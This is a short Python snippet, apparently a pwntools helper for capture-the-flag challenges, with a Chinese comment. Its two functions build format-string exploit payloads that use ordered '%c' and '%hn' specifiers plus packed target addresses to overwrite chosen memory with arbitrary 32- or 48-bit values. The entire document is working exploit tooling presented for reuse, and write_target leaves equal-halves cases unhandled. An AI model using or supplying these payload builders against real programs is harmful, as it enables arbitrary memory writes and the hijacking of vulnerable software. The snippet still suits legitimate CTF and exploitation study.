#target是目标地址，n0是想要写入的东西,k为ljust之后p64(target)为格式化字符串的第几个参数
def write_target(target, n0,k):
    n1 = n0&0xffff 
    n2 = (n0>>16)&0xffff
    n3 = (n0>>32)&0xffff
    #6种情况
    #n1>n2>n3
    if n1>n2 and n1>n3 and n2>n3:
     payload=(f'%{n3}c%{k+2}$hn%{n2-n3}c%{k+1}$hn%{n1-n2}c%{k}$hn'.ljust(40,'a')).encode()+p64(target)+p64(target+2)+p64(target+4)
     return payload
    #n1>n3>n2
    elif n1>n2 and n1>n3 and n3>n2:
     payload=(f'%{n2}c%{k+1}$hn%{n3-n2}c%{k+2}$hn%{n1-n3}c%{k}$hn'.ljust(40,'a')).encode()+p64(target)+p64(target+2)+p64(target+4)
     return payload
    #n2>n1>n3
    elif n2>n1 and n2>n3 and n1>n3:
       payload=(f'%{n3}c%{k+2}$hn%{n1-n3}c%{k}$hn%{n2-n1}c%{k+1}$hn'.ljust(40,'a')).encode()+p64(target)+p64(target+2)+p64(target+4)
       return payload
    #n2>n3>n1
    elif n2>n1 and n2>n3 and n3>n1:
      payload=(f'%{n1}c%{k}$hn%{n3-n1}c%{k+2}$hn%{n2-n3}c%{k+1}$hn'.ljust(40,'a')).encode()+p64(target)+p64(target+2)+p64(target+4)
      return payload
    #n3>n2>n1
    elif n3>n1 and n3>n2 and n2>n1:
      payload=(f'%{n1}c%{k}$hn%{n2-n1}c%{k+1}$hn%{n3-n2}c%{k+2}$hn'.ljust(40,'a')).encode()+p64(target)+p64(target+2)+p64(target+4)
      return payload
    #n3>n1>n2
    elif n3>n1 and n3>n2 and n1>n2:
      payload=(f'%{n2}c%{k+1}$hn%{n1-n2}c%{k}$hn%{n3-n1}c%{k+2}$hn'.ljust(40,'a')).encode()+p64(target)+p64(target+2)+p64(target+4)
      return payload

def write1(target, n0,k=12):
    n1 = n0&0xffff 
    n2 = (n0>>16)&0xffff
    if(n1>n2):
       payload=(f'%{n2}c%{k+1}$hn%{n1-n2}c%{k}$hn'.ljust(0x30,'a')).encode()+p64(target)+p64(target+2)
    else:
       payload=(f'%{n1}c%{k+1}$hn%{n2-n1}c%{k}$hn'.ljust(0x30,'a')).encode()+p64(target+2)+p64(target)
    return payload